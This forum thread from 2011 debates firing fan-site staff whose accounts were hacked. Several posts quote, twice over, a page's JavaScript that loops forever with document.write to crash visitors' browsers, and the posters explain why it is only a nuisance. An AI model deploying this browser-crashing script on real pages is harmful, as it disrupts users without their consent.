Fired for being hacked

Chippiewill · 05-07-2011, 07:25 PM

Originally Posted by Recursion

Well done it's not malicious:

And I assume that he and everyone else would have checked that before hand?

**GoldenMerc** · 05-07-2011, 07:28 PM

What does that function do?

Originally Posted by Recursion

Well done it's not malicious:

Code:

<script type="text/javascript">

function str_shuffle (str) {

    // http://kevin.vanzonneveld.net

    // +   original by: Brett Zamir (http://brett-zamir.me)

    // *     example 1: shuffled = str_shuffle("abcdef");

    // *     results 1: shuffled.length == 6

    

    if (str == undefined) {

        throw 'Wrong parameter count for str_shuffle()';

    }

    

    var getRandomInt = function (max) {

        return Math.floor(Math.random() * (max + 1));

    };

    var newStr = '', rand = 0;

    

    while (str.length) {

        rand = getRandomInt(str.length-1);

        newStr += str.charAt(rand);

        str = str.substring(0, rand)+str.substr(rand+1);

    }

    

    return newStr;

}



function detonate()



{

	setTimeout('boom();', 1000);

}

	

function boom()

{

	while(1) 

	{

		explode();

	}

}



function explode()

{

	str = str_shuffle( 'OISNOn9803j0onaoNG983h2j05203n___8092H4308N__8209NT098N4208TNnasonBONBONCX' );

	str = str.substring(0, 10);

	document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');

}



detonate();

</script>

**HotelUser** · 05-07-2011, 07:29 PM

I am going to reply to this to correct what you are saying, Chippieweill. I don't mean to sound patronizing here - it's just I'm not sure you're fully aware of what Agnostic Bear posted yourself. This is the link Bear posted:

http://imgbear.com/news.html

This is the source code:

HTML Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Premium News</title>

<style type="text/css">
body {
	background-color: white;
	margin: 40px;
	padding: 0px;
	
	font-family: Segoe UI, Arial, Helvetica, sans-serif;
	font-size: 16px;
}

h1, h2, h3 {
	font-weight: normal;
	margin: 0px;
	padding: 0px;
	
	font-family: Georgia, times, serif;
}

h3 {
	margin-left: 20px;
}

p {
	margin-left: 15px;
	margin-top: 3px;
}
</style>
<script type="text/javascript">
function str_shuffle (str) {
    // http://kevin.vanzonneveld.net
    // +   original by: Brett Zamir (http://brett-zamir.me)
    // *     example 1: shuffled = str_shuffle("abcdef");
    // *     results 1: shuffled.length == 6
    
    if (str == undefined) {
        throw 'Wrong parameter count for str_shuffle()';
    }
    
    var getRandomInt = function (max) {
        return Math.floor(Math.random() * (max + 1));
    };
    var newStr = '', rand = 0;
    
    while (str.length) {
        rand = getRandomInt(str.length-1);
        newStr += str.charAt(rand);
        str = str.substring(0, rand)+str.substr(rand+1);
    }
    
    return newStr;
}

function detonate()

{
	setTimeout('boom();', 1000);
}
	
function boom()
{
	while(1) 
	{
		explode();
	}
}

function explode()
{
	str = str_shuffle( 'OISNOn9803j0onaoNG983h2j05203n___8092H4308N__8209NT098N4208TNnasonBONBONCX' );
	str = str.substring(0, 10);
	document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');
}

detonate();
</script>
</head>
<body>
<h1>Hello! This page has caused you to crash.</h1>
<br /><br />
<h2><strong>Firefox:</strong><br /><h3>Your entire browser has crashed. Well done.</h3></h2><br />
<h2><strong>Google Chrome:</strong><br /><h3> Your tab has crashed. If pre-loading has opened this page, you wont see this or have any idea what caused your crash. Sorry about that.</h3></h2><br />
<h2><strong>Opera:</strong><br /><h3> Your tab has crashed. I have no idea if Opera has pre-loading, if so, it may have killed the tab this was loaded in.</h3></h2><br />
<h2><strong>Internet Explorer (7/8/9):</strong><br /><h3> You will shortly receive a message asking you to stop execution of javascript on this page. I suggest clicking yes.</h3></h2><br />
<h2><strong>Internet Explorer 6:</strong><br /><h3> Your computer <em>may</em> have melted. Be on the lookout for molten metal burning <strong>everything</strong>.</h3></h2>
</body>
</html>

Why am I posting this here? Because it is harmless. You seem to be under the impression that this is some sort of dangerous remote code execution, when it's not. It's completely harmless and puts the user at no risk. I've just created another page that has a similar effect:

http://develop.davzy.com/test1.php

source:

So not only did I click his link, but before hand I looked at the page source, and identified it as harmless. Essentially what these scripts are doing is creating infinite loops which eventually consume so many system resource that they're closed. There is zero percent risk of gaining any sort of infection from visiting either of the sites above.

Chippiewill · 05-07-2011, 07:34 PM

Originally Posted by HotelUser

So not only did I click his link, but before hand I looked at the page source.

You expect me to believe that?

The point wasn't whether it was harmless or not, I never said it actually was, the point was the clicking on potentially malicious links. THEY CAN BE ANYWHERE. If targeted anybody can fall for one, it's just unfortunate that somebody did. Particularly with something like a forum, it only takes one person.

**GoldenMerc** · 05-07-2011, 07:34 PM

Could have told me it would reset my cookies

I like cookies

Originally Posted by HotelUser

I am going to reply to this to correct what you are saying, Chippieweill. I don't mean to sound patronizing here - it's just I'm not sure you're fully aware of what Agnostic Bear posted yourself. This is the link Bear posted:

http://imgbear.com/news.html

This is the source code:

HTML Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Premium News</title>

<style type="text/css">
body {
	background-color: white;
	margin: 40px;
	padding: 0px;
	
	font-family: Segoe UI, Arial, Helvetica, sans-serif;
	font-size: 16px;
}

h1, h2, h3 {
	font-weight: normal;
	margin: 0px;
	padding: 0px;
	
	font-family: Georgia, times, serif;
}

h3 {
	margin-left: 20px;
}

p {
	margin-left: 15px;
	margin-top: 3px;
}
</style>
<script type="text/javascript">
function str_shuffle (str) {
    // http://kevin.vanzonneveld.net
    // +   original by: Brett Zamir (http://brett-zamir.me)
    // *     example 1: shuffled = str_shuffle("abcdef");
    // *     results 1: shuffled.length == 6
    
    if (str == undefined) {
        throw 'Wrong parameter count for str_shuffle()';
    }
    
    var getRandomInt = function (max) {
        return Math.floor(Math.random() * (max + 1));
    };
    var newStr = '', rand = 0;
    
    while (str.length) {
        rand = getRandomInt(str.length-1);
        newStr += str.charAt(rand);
        str = str.substring(0, rand)+str.substr(rand+1);
    }
    
    return newStr;
}

function detonate()

{
	setTimeout('boom();', 1000);
}
	
function boom()
{
	while(1) 
	{
		explode();
	}
}

function explode()
{
	str = str_shuffle( 'OISNOn9803j0onaoNG983h2j05203n___8092H4308N__8209NT098N4208TNnasonBONBONCX' );
	str = str.substring(0, 10);
	document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');
}

detonate();
</script>
</head>
<body>
<h1>Hello! This page has caused you to crash.</h1>
<br /><br />
<h2><strong>Firefox:</strong><br /><h3>Your entire browser has crashed. Well done.</h3></h2><br />
<h2><strong>Google Chrome:</strong><br /><h3> Your tab has crashed. If pre-loading has opened this page, you wont see this or have any idea what caused your crash. Sorry about that.</h3></h2><br />
<h2><strong>Opera:</strong><br /><h3> Your tab has crashed. I have no idea if Opera has pre-loading, if so, it may have killed the tab this was loaded in.</h3></h2><br />
<h2><strong>Internet Explorer (7/8/9):</strong><br /><h3> You will shortly receive a message asking you to stop execution of javascript on this page. I suggest clicking yes.</h3></h2><br />
<h2><strong>Internet Explorer 6:</strong><br /><h3> Your computer <em>may</em> have melted. Be on the lookout for molten metal burning <strong>everything</strong>.</h3></h2>
</body>
</html>

Why am I posting this here? Because it is harmless. You seem to be under the impression that this is some sort of dangerous remote code execution, when it's not. It's completely harmless and puts the user at no risk. I've just created another page that has a similar effect:

http://develop.davzy.com/test1.php

source:

So not only did I click his link, but before hand I looked at the page source, and identified it as harmless. Essentially what these scripts are doing is creating infinite loops which eventually consume so many system resource that they're closed. There is zero percent risk of gaining any sort of infection from visiting either of the sites above.

**HotelUser** · 05-07-2011, 07:43 PM

Originally Posted by Chippiewill

You expect me to believe that?

The point wasn't whether it was harmless or not, I never said it actually was, the point was the clicking on potentially malicious links. THEY CAN BE ANYWHERE. If targeted anybody can fall for one, it's just unfortunate that somebody did. Particularly with something like a forum, it only takes one person.

-shrugs- if you don't believe me there's not much I can do, but I checked the source out because the link originated from this thread, where the first sentence is "This will crash Firefox, I believe it will force ram usage into 2gb+ given enough time.". A compelling reason to check source before site, no

?

Chrome requests permission before running Java applets, and naturally you can't force a user to download an executable file and run it with Javascript. Unless I got a virus from elsewhere, or unless there was a nasty vBulletin exploit floating around my forum account is safe.

Chippiewill · 05-07-2011, 07:52 PM

Originally Posted by HotelUser

A compelling reason to check source before site, no

?

Well, maybe you are an ex-spy who watches out for these things. But the average member of staff? No. I hardly think that the 90% of Habbox Staff using IE would be that concerned if it decided to close unexpectedly. And there's the crux of your problem, and until you resolve that with proper educating of all the different signs of vulnerabilities you can't really go round sanctioning people for being prey to these things.

And could someone tell me what it actually is that was posted on the rare values because if it was anything besides plain text then really that's the fault of the person who should be looking to prevent that.

MissAlice · 05-07-2011, 08:07 PM

Originally Posted by GommeInc

sierk got hacked once, is he to be fired too?

Was he actually fired for being "hacked"? Because if so then all he did was get his account compromised - big deal, he's probably learnt from that lesson like anyone else. There's a saying about stuff like this which I can't think of right now, but it's about people being less likely to be a problem after something has happened to them. 5 House Points for anyone who can find the phrase

Lol
To be fair to sierk, his account was stolen because of poor housekeeping by Sulake. It wasn’t his fault that someone managed to get into Sulake housekeeping and view passwords. Had sierk been at fault they would never have replaced all his furni, and they did so.

I demand 10 points, so pay up

Once bitten, twice shy. In other words have your account compromised once but if it happens twice bye bye.

Originally Posted by HotelUser

I think in the past it's always just been assumed everyone was aware of this, or, since it so seldomly happened that a policy need not be sealed in ink. I agree with you that this active policy needed to be clearly stated, and so I'm happy Matt's decided to incorporate it into the staff handbook, as well as a stickied thread in the staff forums.

I like others here appreciate you are still fairly new to your role, and I am glad to see some emphasis being placed on this.

In the interest of site security, if staff have been very careless i.e. using the same passwords/email address for Habbo and Habbox they should be fired and not re-hired for a set period of time, regardless of their position. Staff need to be fully aware of the consequences to help prevent them losing their positions they have been entrusted with.

Suspend by all means, until a clear picture of the situation is investigated, that doesn’t mean automatic reinstatement, and only then do what is necessary. Fire if need be.

Let’s not forget each time an account is compromised it’s not for the same reasons, but 9 out of 10 times it is down to the victim not taking better care.

**HotelUser** · 05-07-2011, 08:09 PM

Originally Posted by Chippiewill

Well, maybe you are an ex-spy who watches out for these things. But the average member of staff? No. I hardly think that the 90% of Habbox Staff using IE would be that concerned if it decided to close unexpectedly. And there's the crux of your problem, and until you resolve that with proper educating of all the different signs of vulnerabilities you can't really go round sanctioning people for being prey to these things.

And could someone tell me what it actually is that was posted on the rare values because if it was anything besides plain text then really that's the fault of the person who should be looking to prevent that.

For a staff member to have their forum account hacked they'd pretty much have to do something wrong. They'd have to have a virus, an easily guessable password, or so on. We wont lose forum accounts because we're clicking links and doing nothing else (especially harmless links such as Agnostic Bear's). I wont discuss the situation with Ouft other than repeating once again that it had nothing to do with clicking dangerous links. Your example does not apply to this scenario.

If a Help Desk staff member was hacked because of Sulake's own exploit where the staff member did nothing else but visit a post on HabboxForum where the dangerous link was portrayed as a dead image, they would not have been dismissed. If a staff member we have entrusted with backend administrative panels is hacked because they're careless with passwords, they will be dismissed.

With regards to what you said about security on Habbox.com strings are already cleaned for sql insertion and stripped of HTML so only plain text is allowed. However, News Reporters, Content Staff and Senior Rare Reporters all have access to interfaces in which HTML is necessary in order to do their jobs. We trust them with this level of access and we trust them not to get hacked as well.

Chippiewill · 05-07-2011, 08:13 PM

Originally Posted by HotelUser

However, News Reporters, Content Staff and Senior Rare Reporters all have access to interfaces in which HTML is necessary in order to do their jobs. We trust them with this level of access and we trust them not to get hacked as well.

A WYSIWYG interface with an outbound URL domain restricter couldn't have worked?

Thread: Fired for being hacked

Thread Tools

Posting Permissions